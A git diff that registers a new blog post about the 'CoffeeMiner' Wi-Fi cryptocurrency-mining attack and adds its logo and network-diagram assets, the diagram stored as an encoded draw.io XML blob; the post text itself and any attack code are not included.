diff --git a/blogo-input/blogo.json b/blogo-input/blogo.json index 4ec757f..1b4bb97 100755 --- a/blogo-input/blogo.json +++ b/blogo-input/blogo.json @@ -5,6 +5,10 @@ "indexTemplate": "index.html", "postThumbTemplate": "postThumbTemplate.html", "posts": [ + { + "thumb": "coffeeminer_thumb.md", + "md": "coffeeminer-hacking-wifi-cryptocurrency-miner.md" + }, { "thumb": "flock-botnet_thumb.md", "md": "flock-botnet.md" diff --git a/blogo-input/img/posts/coffeeMiner/coffeeMiner-logo-small.png b/blogo-input/img/posts/coffeeMiner/coffeeMiner-logo-small.png new file mode 100644 index 0000000..5e6f289 Binary files /dev/null and b/blogo-input/img/posts/coffeeMiner/coffeeMiner-logo-small.png differ diff --git a/blogo-input/img/posts/coffeeMiner/coffeeMiner-logo.png b/blogo-input/img/posts/coffeeMiner/coffeeMiner-logo.png new file mode 100644 index 0000000..d4425b6 Binary files /dev/null and b/blogo-input/img/posts/coffeeMiner/coffeeMiner-logo.png differ diff --git a/blogo-input/img/posts/coffeeMiner/coffeeMiner-logo.xcf b/blogo-input/img/posts/coffeeMiner/coffeeMiner-logo.xcf new file mode 100644 index 0000000..3739cef Binary files /dev/null and b/blogo-input/img/posts/coffeeMiner/coffeeMiner-logo.xcf differ diff --git a/blogo-input/img/posts/coffeeMiner/coffeeMiner-network-attack.png b/blogo-input/img/posts/coffeeMiner/coffeeMiner-network-attack.png new file mode 100644 index 0000000..f040a31 Binary files /dev/null and b/blogo-input/img/posts/coffeeMiner/coffeeMiner-network-attack.png differ diff --git a/blogo-input/img/posts/coffeeMiner/coffeeMiner-network-attack.xml b/blogo-input/img/posts/coffeeMiner/coffeeMiner-network-attack.xml new file mode 100644 index 0000000..b71bf44 --- /dev/null +++ b/blogo-input/img/posts/coffeeMiner/coffeeMiner-network-attack.xml @@ -0,0 +1 @@ +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